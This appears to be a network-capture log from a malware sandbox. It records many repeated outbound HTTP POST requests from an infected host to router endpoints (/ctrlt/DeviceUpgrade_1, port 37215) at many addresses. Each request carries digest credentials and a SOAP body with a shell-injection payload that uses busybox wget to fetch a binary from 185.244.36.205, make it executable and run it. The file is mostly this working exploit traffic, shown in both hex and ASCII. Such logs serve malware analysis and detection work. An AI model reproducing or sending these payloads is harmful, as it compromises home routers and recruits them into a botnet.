                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1416192.168.2.155404494.21.1.1037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400207043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1417192.168.2.1538302197.59.60.8137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400227070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1418192.168.2.1559696222.205.250.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400252104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1419192.168.2.155709245.119.217.17837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400270939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1420192.168.2.1541948181.243.52.12237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400291920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1421192.168.2.1543178190.162.114.537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400319099 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1422192.168.2.1534910190.1.16.20937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400352955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1423192.168.2.1560230138.119.53.6337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400357008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1424192.168.2.153329841.172.115.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400398016 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1425192.168.2.155889641.6.45.10337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400398970 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
